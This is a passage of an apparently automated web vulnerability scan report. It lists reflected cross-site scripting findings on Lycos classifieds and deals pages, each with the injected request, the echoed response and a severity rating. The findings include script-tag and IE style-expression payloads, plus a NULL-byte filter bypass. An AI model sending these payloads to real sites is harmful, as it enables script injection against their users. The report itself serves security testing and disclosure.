Content-Length: 17700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-suv23f0c"><script>alert(1)</script>689aeb97041/?mobile=1" rel="nofollow">
...[SNIP]...

1.233. http://classifieds.lycos.com/vehicle-car-suv/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-suv/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2abea"><script>alert(1)</script>c96611a4213 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-suv/?2abea"><script>alert(1)</script>c96611a4213=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:39 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 105613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-suv/?2abea"><script>alert(1)</script>c96611a4213=1&mobile=1" rel="nofollow">
...[SNIP]...

1.234. http://classifieds.lycos.com/vehicle-car-truck/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-truck/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8355"><script>alert(1)</script>4bd8ec7dbaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-truckd8355"><script>alert(1)</script>4bd8ec7dbaa/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-truckd8355"><script>alert(1)</script>4bd8ec7dbaa/?mobile=1" rel="nofollow">
...[SNIP]...

1.235. http://classifieds.lycos.com/vehicle-car-truck/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-truck/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51867"><script>alert(1)</script>116d2a68c1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-truck/?51867"><script>alert(1)</script>116d2a68c1f=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:36 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 101338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-truck/?51867"><script>alert(1)</script>116d2a68c1f=1&mobile=1" rel="nofollow">
...[SNIP]...

1.236. http://classifieds.lycos.com/vehicle-car/2008-ford-40k-miles-2416144596 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car/2008-ford-40k-miles-2416144596

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87310"><script>alert(1)</script>9e0ee8e16ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car87310"><script>alert(1)</script>9e0ee8e16ae/2008-ford-40k-miles-2416144596 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:49 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car87310"><script>alert(1)</script>9e0ee8e16ae/2008-ford-40k-miles-2416144596?mobile=1" rel="nofollow">
...[SNIP]...

1.237. http://classifieds.lycos.com/vehicle-car/2008-ford-40k-miles-2416144596 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car/2008-ford-40k-miles-2416144596

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007ffaf"><script>alert(1)</script>1459be4bf30 was submitted in the REST URL parameter 2. This input was echoed as 7ffaf"><script>alert(1)</script>1459be4bf30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /vehicle-car/2008-ford-40k-miles-2416144596%007ffaf"><script>alert(1)</script>1459be4bf30 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:49 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car/2008-ford-40k-miles-2416144596%007ffaf"><script>alert(1)</script>1459be4bf30?mobile=1" rel="nofollow">
...[SNIP]...

1.238. http://classifieds.lycos.com/vehicle-car/2008-ford-40k-miles-2416144596 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car/2008-ford-40k-miles-2416144596

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1da9"><script>alert(1)</script>abf23606d77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car/2008-ford-40k-miles-2416144596?c1da9"><script>alert(1)</script>abf23606d77=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:25 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=vehicle%2Fcar; path=/
Set-Cookie: classifieds[lastpage][0][name]=Cars; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car/2008-ford-40k-miles-2416144596?c1da9"><script>alert(1)</script>abf23606d77=1&mobile=1" rel="nofollow">
...[SNIP]...

1.239. http://classifieds.lycos.com/vehicle-motorcycle/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-motorcycle/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f957e"><script>alert(1)</script>e606bae3932 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-motorcyclef957e"><script>alert(1)</script>e606bae3932/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:18 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-motorcyclef957e"><script>alert(1)</script>e606bae3932/?mobile=1" rel="nofollow">
...[SNIP]...

1.240. http://classifieds.lycos.com/vehicle-motorcycle/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-motorcycle/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f418a"><script>alert(1)</script>8b2f5758549 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-motorcycle/?f418a"><script>alert(1)</script>8b2f5758549=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:42 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 81935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-motorcycle/?f418a"><script>alert(1)</script>8b2f5758549=1&mobile=1" rel="nofollow">
...[SNIP]...

1.241. http://classifieds.lycos.com/vehicle-parts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-parts/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22cbd"><script>alert(1)</script>e56189542c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-parts22cbd"><script>alert(1)</script>e56189542c1/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:21 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-parts22cbd"><script>alert(1)</script>e56189542c1/?mobile=1" rel="nofollow">
...[SNIP]...

1.242. http://classifieds.lycos.com/vehicle-parts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-parts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91b38"><script>alert(1)</script>e3c05e93053 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-parts/?91b38"><script>alert(1)</script>e3c05e93053=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:51 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 83433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-parts/?91b38"><script>alert(1)</script>e3c05e93053=1&mobile=1" rel="nofollow">
...[SNIP]...

1.243. http://classifieds.lycos.com/vehicle/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c67f6"><script>alert(1)</script>5959bf12699 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehiclec67f6"><script>alert(1)</script>5959bf12699/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:22 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehiclec67f6"><script>alert(1)</script>5959bf12699/?mobile=1" rel="nofollow">
...[SNIP]...

1.244. http://classifieds.lycos.com/vehicle/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abf83"><script>alert(1)</script>3bd7c3d9a6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle/?abf83"><script>alert(1)</script>3bd7c3d9a6c=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:36 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 96135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle/?abf83"><script>alert(1)</script>3bd7c3d9a6c=1&mobile=1" rel="nofollow">
...[SNIP]...

1.245. http://classifieds.lycos.com.au/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com.au
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eeb5"><script>alert(1)</script>33f3545c70b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6eeb5"><script>alert(1)</script>33f3545c70b=1 HTTP/1.1
Host: classifieds.lycos.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:20:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/?6eeb5"><script>alert(1)</script>33f3545c70b=1&mobile=1" rel="nofollow">
...[SNIP]...

1.246. http://classifieds.lycos.in/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.in
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e577e"><script>alert(1)</script>5bdc50df2f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e577e"><script>alert(1)</script>5bdc50df2f3=1 HTTP/1.1
Host: classifieds.lycos.in
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:20:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:15 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/?e577e"><script>alert(1)</script>5bdc50df2f3=1&mobile=1" rel="nofollow">
...[SNIP]...

1.247. http://deals.lycos.com/coupons [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /coupons

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de73e"style%3d"x%3aexpression(alert(1))"be0d61fbb03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de73e"style="x:expression(alert(1))"be0d61fbb03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coupons?de73e"style%3d"x%3aexpression(alert(1))"be0d61fbb03=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=1.1297090250.1.1.utmcsr=lycoshome|utmccn=home_deals|utmcmd=left_nav; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.4.10.1297090205; LycosDeals=c51c5ocafhhc6sgla3vm204iv1;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:56:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:56:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43186

<!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
   
   <title>Online Coupons, Shopping D
...[SNIP]...
